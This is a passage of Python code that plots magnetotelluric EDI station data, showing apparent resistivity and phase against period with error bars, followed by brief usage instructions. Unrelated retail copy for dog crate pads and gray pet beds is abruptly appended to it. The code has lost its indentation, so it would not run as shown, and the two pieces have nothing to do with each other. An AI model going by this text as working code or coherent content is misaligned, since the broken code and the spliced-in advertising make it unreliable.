if pylab.np.mean(phi_te) > 90 and pylab.np.mean(phi_tm) > 90:
phi_te = [i % 90 for i in phi_te]
phi_tm = [i % 90 for i in phi_tm]
for r in edi.Z.resistivity_err:
reserr_te.append(r[0, 1])
reserr_tm.append(r[1, 0])
for p in edi.Z.phase_err:
phierr_te.append(p[0, 1])
phierr_tm.append(p[1, 0])
periods = 1. / edi.freq
resplotelement_xy = None
resplotelement_yx = None
axes = pylab.figure('EDI ' + fn)
ax1 = pylab.subplot(211)
if 'n' in lo_comps:
resplotelement_xy = pylab.errorbar(
periods, res_te, reserr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
resplotelement_yx = pylab.errorbar(
periods, res_tm, reserr_tm, marker='x', c='r', fmt='x')
pylab.xscale('log', nonposx='clip')
pylab.yscale('log', nonposy='clip')
    # extremes over both curves; np.min(res_te, res_tm) wrongly treated res_tm as the axis argument
    minval = min(min(res_te), min(res_tm))
    maxval = max(max(res_te), max(res_tm))
pylab.xlim(0.5 * pylab.min(periods), 2 * pylab.max(periods))
# ylim([0.1,100])
pylab.ylim([minval / 10, maxval * 10])
pylab.autoscale(False)
pylab.ylabel(r' $\rho$ (in $\Omega m$)')
pylab.setp(ax1.get_xticklabels(), visible=False)
# share x only
ax2 = pylab.subplot(212, sharex=ax1)
pylab.autoscale(False)
# ylim(-45,135)
if 'n' in lo_comps:
pylab.errorbar(periods, phi_te, phierr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
pylab.errorbar(periods, phi_tm, phierr_tm, marker='x', c='r', fmt='x')
    pylab.ylabel(r'Phase angle ($\degree$)')
pylab.xlabel('Period (in s)')
pylab.plot([pylab.xlim()[0], pylab.xlim()[1]], [45, 45], '-.', c='0.7')
pylab.ylim([-0, 90])
ax1.legend([resplotelement_xy, resplotelement_yx], ['$E_{X}/B_Y$', '$E_Y/B_X$'], loc=2, ncol=1,
numpoints=1, markerscale=0.8, frameon=True, labelspacing=0.3,
prop={'size': 8}, fancybox=True, shadow=False)
pylab.tight_layout()
if saveplot is True:
pylab.ioff()
outfn = op.splitext(fn)[0] + '.png'
pylab.savefig(outfn, bbox_inches='tight')
pylab.close('all')
pylab.ion()
return outfn
else:
pylab.ion()
pylab.show(block=True)
return None
if __name__ == '__main__':
main()
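Typical invocations, assuming the script is saved as plot_edi.py (the file name is a guess; any name works). Any second argument containing 's' switches from an interactive window to saving a PNG next to the EDI file:

    python plot_edi.py station01.edi      # interactive resistivity/phase plot
    python plot_edi.py station01.edi s    # writes station01.png and exits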
|
You can also check the Orthopedic 4" Dog Crate Pad by Big Barker (36" x 24", waterproof and tear resistant) and the MidWest Life Stages 36" Double Door Folding Metal Dog Crate (divider panel, floor-protecting feet, leak-proof dog tray, 36L x 24W x 27H inches, intermediate dog breeds) for a better comparison at Dog-bed.org.
Dog Bed Mattress Cat Plush Indoor Crate, Modern Gray. Details: a comfortable gray dog/cat bed that fits 24"L dog crates, with a synthetic overstuffed top and a non-skid bottom surface, sized to work for dogs and cats between sizes. The ombré neutral gray color suits any décor and the bed is low-maintenance. Description: whether you want to pamper a dog (or a cat...), the Deluxe Ombré Swirl Bed is the perfect pet bed for you! It comes in sizes that perfectly fit every breed of dog or cat.
These neutral colors (mocha and gray) complement your home and give your pet a place to rest.
All pet beds have bottoms that protect hardwood or tile floors, and they are generously sized.